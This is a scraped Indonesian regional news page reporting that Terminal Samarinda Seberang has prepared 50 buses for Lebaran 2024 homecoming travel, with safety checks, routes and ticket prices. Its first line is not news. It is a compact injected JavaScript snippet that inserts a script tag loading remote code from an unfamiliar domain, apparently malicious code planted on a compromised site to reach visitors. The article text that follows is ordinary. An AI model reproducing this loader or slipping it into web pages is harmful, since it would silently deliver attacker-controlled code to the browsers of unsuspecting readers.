(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kalimantan Timur

Terminal Samarinda Seberang Siapkan 50 Bus Layani Pemudik


KANALKALIMANTAN.COM, SAMARINDA – Terminal Samarinda Seberang memastikan kesiapannya dalam melayani pemudik Lebaran 2024 dengan menyediakan puluhan bus yang telah melalui pemeriksaan ketat atau ramp check secara rutin.

Setidaknya, ada sekitar 50 bus yang disiapkan oleh Terminal Samarinda Seberang, sebagai penyedia layanan transportasi darat. Puluhan bus tersebut juga secara masif dilakukan pemeriksaan terkait pengamanannya.

Staff Terminal Samarinda Seberang, Andrew Novanda menjelaskan, puluhan bus tersebut merupakan bentuk komitmen Terminal Samarinda Seberang dalam memberikan fasilitas transportasi darat bagi para pemudik.

“Ada 50 bus dari empat PO, yakni PO Samarinda Lestari, PO Pulau Indah Jaya, PO Bintang Mas, serta Damri,” jelasnya, melansir dari kaltimtoday.co -jaringan Suara.com-, Senin (1/4/2024).

Baca juga: Mantan Bupati Batola dan Sekda Bersaksi di Sidang Korupsi Eks Direktur BPR Batola

Lebih lanjut, Andrew bersama timnya selalu memastikan agar para penumpang bisa mendapatkan pelayanan transportasi darat yang terbaik. Oleh sebab itu, fasilitas dari kendaraan bus juga harus diperhitungkan secara matang.

“Kami rutin tiap hari lakukan ramp check ya, sebelum keberangkatan. Pengecekannya terkait Uji KIR, lampu, ban, mesin, dan aspek-aspek lainnya,” tuturnya.

Tidak hanya itu, Andrew memastikan, seluruh kendaraan bus yang ada di Terminal Samarinda Seberang, sudah terpasangi Air Conditioner (AC) dan didukung toilet di dalamnya. Lalu, satu kendaraan bus berisi 44 kursi bagi para penumpangnya.

Dia menambahkan, rute keberangkatan dari Samarinda, menuju Kota Balikpapan, kemudian berakhir di Terminal Tipe A Gambut Barakat, Kabupaten Banjar, Kalimantan Selatan.

Baca juga: Pemprov Kalsel Siap Layani 1.000 Penumpang Mudik Gratis

“Untuk harga tiketnya berkisar Rp 300 ribu, dan disesuaikan juga sama tujuan dari si penumpang. Untuk harga tiket terbilang cukup normal,” pungkasnya.

Kondisi arus mudik di Terminal Samarinda Seberang saat ini masih terbilang normal. Andrew memprediksi lonjakan penumpang akan terjadi pada H-3 dan H-1 Lebaran.

“Per hari bisa 100 penumpang, saat ini masih normal. Prediksinya H-3 dan H-1 itu pasti melonjak naik,” jelasnya.

Andrew mengimbau kepada seluruh masyarakat Samarinda, agar bisa tertib dan mempersiapkan diri dalam menjalani mudik di tahun ini. (Kanalkalimantan/Suara.com/kk)

Editor: kk


Risa

Recent Posts

Dilakban di Paha, Empat Orang di Bandara Juwata Tarakan Selundupkan 4 Kg Sabu

KANALKALIMANTAN.COM, TARAKAN - Empat orang calon penumpang pesawat dengan rute Tarakan-Makassar batal berangkat lantaran kedapatan… Read More

9 jam ago

Satgas TMMD Bikin Sumur Bor untuk Warga Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pengerjaan sumur bor menjadi salah satu sasaran fisik program TNI Manunggal Membangun… Read More

11 jam ago

Jemaah Termuda Kloter 1 Daftar Haji saat Umur 10 Tahun, Setor 2014 Berangkat 2024

KANALKALIMANTAN.COM, BANJARBARU - Berangkat haji ke Baitullah menunaikan Rukun Islam kelima sepenuhnya adalah panggilan. Berusia… Read More

13 jam ago

Embarkasi Banjarmasin Berangkatkan 5.759 JCH Kalsel-Kalteng, Pelayanan Penuh Jemaah Lansia

KANALKALIMANTAN.COM, BANJARBARU - Sebanyak 4.071 jemaah calon haji (JCH) asal Kalimantan Selatan (Kalsel) akan berangkat… Read More

14 jam ago

Caleg Terpilih Tak Harus Mundur Jika Maju Pilkada, Begini Penjelasan Ketua KPU Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Caleg Anggota Dewan Perwakilan Rakyat (DPR), Anggota Dewan Perwakilan Rakyat Daerah (DPRD)… Read More

16 jam ago

Lepas Keberangkatan 320 Calon Haji, Ini Pesan Bupati Banjar

KANALKALIMANTAN.COM, MARTAPURA - Bagian dalam dan luar halaman Mahligai Sultan Adam di Jalan A Yani… Read More

17 jam ago

This website uses cookies.